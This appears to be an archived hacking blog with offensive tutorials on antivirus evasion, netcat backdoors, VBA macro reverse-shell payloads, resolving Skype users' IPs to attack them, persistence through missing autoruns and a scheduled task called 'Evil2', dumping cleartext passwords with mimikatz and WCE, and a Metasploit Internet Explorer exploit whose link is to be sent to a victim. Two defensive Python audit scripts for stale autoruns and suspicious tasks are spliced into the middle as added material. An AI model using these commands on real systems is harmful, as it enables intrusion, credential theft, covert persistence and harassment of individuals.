Wednesday, October 30, 2013

List of Different AV Evasion Frameworks.

Today we are going to talk about different AV evasion frameworks for Metasploit payloads and how to use them. Knowing which AV you have to bypass is very important, because then we don't have to worry about FUD. A given payload can bypass some specific AV products, while other AV products cannot be bypassed using that payload.

(1)Veil:-


Veil is a Python-based tool which creates FUD payloads. It is one of the best frameworks for AV evasion. On the 15th of every month, at least one new payload module will be released.

Click here for how to install & use Veil.

(2)AV0id :-


Anti-Virus Bypass Metasploit Payload Generator Script.

wget https://github.com/nccgroup/metasploitavevasion/archive/master.zip
unzip master.zip
cd metasploitavevasion-master/
./avoid.sh


Thursday, October 24, 2013

Backdoor using Netcat, cryptcat, ncat.

Today we are going to talk about Netcat and its alternatives; I assume that all of you are familiar with Netcat. If not, then read here. I also assume that you have already opened port 455 using the following command.

netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Attacker's IP: 192.168.56.1

Victim's IP: 192.168.56.101

We will talk about Netcat, cryptcat & ncat.

(A)Netcat:-


Netcat is used as a backdoor. After gaining access to the machine, we set up "netcat" as a startup service by making changes to the system registry, and then we open a port for communication. On the attacker side, just start a netcat listener. Here is a tutorial on how to create a netcat backdoor.

But if you know the method used in that tutorial, you know there are some disadvantages to using netcat.

(1) Most AV products flag netcat as a hacking tool: I know you can use a crypter, but general behavior detection by AV is still possible.



(2) Clear text communication (no encryption): anyone on the same network can view your communication. Also, because the communication is in clear text, a firewall or AV can pop up and block it.


Friday, October 18, 2013

Get shell Using Shellcode in Macro.

We can execute shellcode directly in a macro. It's a very old method, but it's still useful because AV doesn't trigger on it. First we will generate the VB code of our payload.

msfconsole
use payload/windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set LPORT 443
generate -t vba
exploit

Monday, October 14, 2013

How to detect Avast Antivirus remotely?

During an assessment, if you know which antivirus is used by the client, then you have won half the battle, because you can download a trial version of that AV, install it in VirtualBox and try to bypass it. That way, during the real assessment your payload or binary doesn't get caught. Today we are going to try to detect whether the client has installed Avast or not.

The original video is posted here. Avast has a site blocking feature, so if you want to block any site you can put its address in the block URL section of the Avast interface. When someone loads that site, they get the response shown in the image below.


Friday, October 11, 2013

Fun with skype resolver

Skype resolvers are used by hackers to get Skype users' IP addresses; when a hacker gets a user's IP address, they usually hit them off or DDoS them.

If your victim is in your friend list and you are using Linux, then it's very simple to get his IP.

netstat -tupan | grep skype > n1

Now chat with your victim; as soon as you get a reply, use the following commands.

netstat -tupan | grep skype > n2

diff n1 n2

Now we have the IP of the victim.

In most situations our victim is not in our friend list. For that situation, we are going to use an online Skype resolver. You can also use a bash script which I wrote for getting the IP of the victim.

root@bt:~# git clone https://github.com/niravkdesai/skypersolver.sh

root@bt:~# cd skypersolver.sh/

root@bt:~/skypersolver.sh# sh skypersolver.sh


Use one of the following links to get the IP of your victim using his Skype user name.

(1)http://www.skyperesolver.com/

(2)http://skresolver.com/

(3)http://www.speedresolve.com/resolve.php

(4)http://skypegrab.com/skype-beta

(5)http://iskyperesolve.com/

Okay, we got the IP. Now you can directly DoS or DDoS them (DoS and DDoS attacks are illegal). But we are going to use a different technique to shut down the victim's PC using RDP.

First scan the IP to find the open ports of the victim.

root@bt:~# nmap 192.168.56.101

Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-11 18:41 IST
Nmap scan report for 192.168.56.101
Host is up (0.00077s latency).
Not shown: 995 filtered ports
PORT      STATE  SERVICE
139/tcp     open   netbios-ssn
445/tcp     open   microsoft-ds
2869/tcp   closed icslap
3389/tcp   open   ms-wbt-server
10243/tcp closed unknown
MAC Address: 08:00:27:B3:A3:80 (Cadmus Computer Systems)


Monday, October 7, 2013

Get shell using Missing Autoruns.

In the previous post we saw how we can execute a scheduled task after compromising a PC. Today we will see another method of maintaining access to a compromised PC.

(A) When we install programs in a Windows environment, some of them ask to run at startup. These programs write a value to the Windows registry, and whenever the PC is restarted, the program runs in the background. When uninstallation of such a program is not completed, it fails to remove its value from the registry. This is called a Missing Autorun.

After compromising the PC, we have to find missing autoruns on the victim machine. For this purpose we will use Sysinternals' autorunsc.exe.

(1) Get a meterpreter shell.

(2) Upload Sysinternals' autoruns.exe & autorun.exe to the victim machine.

(3) Now, from the upload directory, execute the following command to get the missing autoruns of the machine:

autorunsc.exe -a | findstr /n /R "File\ not\ found"

(4) Now we have a list of the files which are missing; these files are run at startup time.
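
The same "File not found" entries are what a defender wants to find and delete before anyone else does. The following Python script is an added example, not from the original post: it reads autorunsc CSV output and lists the stale entries to clean up, putting those outside admin-only folders first. The column names, the `File not found: <path>` form of the image path and every sample row are assumptions constructed for illustration.

```python
import csv
import io
import ntpath

# Constructed sample in the shape of autorunsc CSV output. The column names and
# the "File not found: <path>" form of Image Path are assumptions; all entries
# are invented.
SAMPLE = r'''Entry Location,Entry,Enabled,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,VBoxTray,enabled,c:\windows\system32\vboxtray.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,OldSync,enabled,File not found: C:\OldSync\sync.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run,Helper,disabled,File not found: C:\Program Files\Helper\helper.exe
'''

MARKER = "File not found:"
# Folders whose default ACLs let only administrators create files.
ADMIN_ONLY_ROOTS = ("c:\\windows\\", "c:\\program files\\",
                    "c:\\program files (x86)\\")


def stale_autoruns(csv_text):
    """Return autorun entries whose target file is missing, most urgent first."""
    stale = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        image = row["Image Path"].strip()
        if not image.startswith(MARKER):
            continue                      # target exists, nothing to clean up
        path = image[len(MARKER):].strip()
        folder = ntpath.dirname(path).lower() + "\\"
        stale.append({
            "location": row["Entry Location"],
            "entry": row["Entry"],
            "missing": path,
            "enabled": row["Enabled"].lower() == "enabled",
            # Outside the admin-only roots the folder ACL must be checked by hand.
            "check_acl": not folder.startswith(ADMIN_ONLY_ROOTS),
        })
    # Enabled entries pointing outside admin-only folders go to the top.
    stale.sort(key=lambda e: (not e["check_acl"], not e["enabled"]))
    return stale


if __name__ == "__main__":
    for e in stale_autoruns(SAMPLE):
        note = "check folder ACL, then delete" if e["check_acl"] else "delete"
        print(f'{e["location"]}\\{e["entry"]} -> {e["missing"]} ({note})')
```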


Friday, October 4, 2013

Schedule Task in windows after Exploitation.

Recently at Derbycon, mubix & carnal0wnage presented "Windows attacks: AT is the new black". It's a really great presentation. You can find it here. So I will put their method here.

After getting a meterpreter shell, we have to maintain access to the shell. You can use the meterpreter backdoor & persistent backdoor, but most of the time they will be caught by AV. You can create a FUD payload using Veil. We can also create a scheduled task for our backdoor.

First create a batch file and put the following code in it:

@echo off
"C:\Documents and Settings\nirav\Desktop\backdoor.exe"


Then upload your backdoor & the batch file you created. Please adjust the path in the batch file according to the upload path of your backdoor.

Get clear text password:-

The following are different methods of getting the clear text password of Windows.

(1) Use mimikatz or wce to get the clear text password of the victim.

(2) You can also use the mimikatz password dump method.

(3) You can also use the mimikatz meterpreter plugin, which I used in this tutorial.

   meterpreter > load mimikatz
   meterpreter > help mimikatz
   meterpreter > kerberos
   meterpreter > mimikatz_command -h
   meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"

(4) You can use wce & mimikatz in memory without uploading the binary.

(a)WCE in memory:-

cd %systemroot%
cd system32
pwd
execute -H -m -d calc.exe -f /root/wce.exe -a "-o foo.txt"
cat foo.txt

(b)Mimikatz in memory:-

cd %systemroot%
cd system32
execute -H -i -c -m -d calc.exe -f /root/mimi/Win32/mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

So till now I uploaded one batch file and the backdoor & got the clear text password.

Now we are going to schedule our backdoor, using the schtasks command. For details of the schtasks options, visit here. In this tutorial I schedule my backdoor daily at 22:16, so every day at 22:16 my backdoor will be executed & I will get a shell.

C:\Documents and Settings\nirav> SchTasks /Create /SC DAILY /TN Evil2 /TR "\"C:\Documents and Settings\nirav\Desktop\sch.bat"" /ST 22:16:00

It will ask you to enter the password which we got before.


You can also use different options like ONIDLE, ONLOGON and ONSTART & execute a different binary according to your need.
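
A task like Evil2 stands out when the scheduled tasks on a host are audited. The following Python script is an added example, not part of the original post: it parses `schtasks /query /fo CSV /v` output and flags tasks whose action runs from a user-writable path or is a script. The sample rows other than Evil2, the path patterns and the function names are assumptions.

```python
import csv
import io
import re

# Constructed sample of `schtasks /query /fo CSV /v`, cut down to the columns
# read below; the host, users and all tasks except Evil2 are invented.
SAMPLE = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","DefragWeekly","C:\WINDOWS\system32\defrag.exe C:","SYSTEM","Weekly"
"WS01","Evil2","""C:\Documents and Settings\nirav\Desktop\sch.bat""","nirav","Daily"
"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","Updater","C:\Users\alice\AppData\Local\Temp\upd.exe /silent","alice","At logon time"
'''

# Path patterns are assumptions; extend them for the environment being audited.
USER_WRITABLE = re.compile(
    r"\\(documents and settings|users)\\[^\\]+\\|\\(temp|tmp|programdata)\\", re.I)
SCRIPT_EXT = re.compile(r"\.(bat|cmd|vbs|js|ps1)$", re.I)
QUOTED = re.compile(r'^"([^"]+)"')
UNQUOTED = re.compile(r"^(.+?\.[a-z0-9]{2,4})(?=\s|$)", re.I)


def action_path(task_to_run):
    """Return the program path from a 'Task To Run' value, without arguments."""
    value = task_to_run.strip()
    m = QUOTED.match(value) or UNQUOTED.match(value)
    return m.group(1) if m else value


def audit_tasks(csv_text):
    """Return (task name, program path, reasons) for tasks worth reviewing."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["TaskName"] == "TaskName":   # header repeated mid-output
            continue
        path = action_path(row["Task To Run"])
        reasons = []
        if USER_WRITABLE.search(path):
            reasons.append("runs from a user-writable location")
        if SCRIPT_EXT.search(path):
            reasons.append("action is a script")
        if reasons:
            findings.append((row["TaskName"], path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in audit_tasks(SAMPLE):
        print(f"{name}: {path} ({'; '.join(reasons)})")
```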

Tuesday, October 1, 2013

Exploit For All IE version(CVE-2013-3893).

Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded here.

This module exploits a use-after-free vulnerability that currently targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc., were targeted as well.

For more technical detail, view the Metasploit blog here.

The Metasploit module can currently only be tested on Internet Explorer 9 on Windows 7 SP1 with either Office 2007 or Office 2010 installed.


msf > use exploit/windows/browser/ie_setmousecapture_uaf
msf exploit(ie_setmousecapture_uaf) > set srvhost 192.168.56.1
srvhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set uripath /
uripath => /
msf exploit(ie_setmousecapture_uaf) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ie_setmousecapture_uaf) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf exploit(ie_setmousecapture_uaf) > set lport 443
lport => 443
msf exploit(ie_setmousecapture_uaf) > run
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.1:443
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.


Send this link to the victim. As soon as he opens the link, you will get a meterpreter shell.
